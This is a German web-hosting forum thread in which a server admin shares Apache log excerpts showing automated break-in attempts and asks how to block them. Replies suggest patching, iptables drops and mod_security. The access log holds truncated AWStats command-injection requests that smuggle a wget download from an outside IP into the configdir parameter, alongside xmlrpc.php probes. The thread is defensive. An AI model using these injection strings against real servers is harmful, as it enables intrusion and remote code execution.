RootDS Linux (S4Y) - Hackingversuche...

R

RootDS

Registered User
Hallo!

Seit einigen Tagen finde ich in den Log-Dateien meines RootDS Linux (SuSE 9.3, Server4You) vermehrt folgende Einträge:

In der vsxxxxxx.vserver.de_access.log...
Code: 
210.177.203.6 - - [16/Jan/2006:08:46:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%
210.177.203.6 - - [16/Jan/2006:08:46:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%
210.177.203.6 - - [16/Jan/2006:08:46:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2
210.177.203.6 - - [16/Jan/2006:08:46:59 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:01 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:02 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
210.177.203.6 - - [16/Jan/2006:08:47:03 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
210.177.203.6 - - [16/Jan/2006:08:47:05 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:06 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
210.177.203.6 - - [16/Jan/2006:08:47:08 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:09 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:10 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:12 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

und in der vsxxxxxx.vserver.de_error.log...
Code: 
[Mon Jan 16 08:46:55 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/awstats
[Mon Jan 16 08:46:57 2006] [error] [client 210.177.203.6] script not found or unable to stat: /srv/www/confixx/html/cgi-bin/awstats.pl
[Mon Jan 16 08:46:58 2006] [error] [client 210.177.203.6] script not found or unable to stat: /srv/www/confixx/html/cgi-bin/awstats
[Mon Jan 16 08:46:59 2006] [error] [client 210.177.203.6] script '/srv/www/confixx/html/xmlrpc.php' not found or unable to stat
[Mon Jan 16 08:47:02 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blog
[Mon Jan 16 08:47:03 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blog
[Mon Jan 16 08:47:04 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blogs
[Mon Jan 16 08:47:06 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/drupal
[Mon Jan 16 08:47:07 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/phpgroupware
[Mon Jan 16 08:47:09 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/wordpress
[Mon Jan 16 08:47:09 2006] [error] [client 210.177.203.6] script '/srv/www/confixx/html/xmlrpc.php' not found or unable to stat
[Mon Jan 16 08:47:11 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/xmlrpc
[Mon Jan 16 08:47:13 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/xmlsrv

Die sind nur die Einträge der IP 210.177.203.6. Identische Einträge finde ich für viele viele andere IPs. So wie es aussieht, würde ich sagen versucht jemand, über bekannte Lücken in das System zu kommen.

Kann man diese Abfragen - da es immer auf die gleiche Verzeichnisse und Dateien abzielt - irgendwie blocken?
 
Habe ich auch den ganzen Tag. Guck halt das du den Server auf dem aktuellen Stand hälst. Oder wenn es dich stört und die IPs immer wieder kommen dann blocke diese über ein DROP in den iptables.
 
Verhindern kannst Du das nicht, da sich ja die IPs sicher immer wieder unterscheiden. Wenn Du aber sicher(er) gehen möchtest, schau Dir mal modsecurity an.

PS: Genau lesen und in Ruhe testen, das kann etwas zu lasten der Performance gehen.
Bereits vorgefertigte Konfigs gibt es im Netz.
 
You must log in or register to reply here.
Back
Top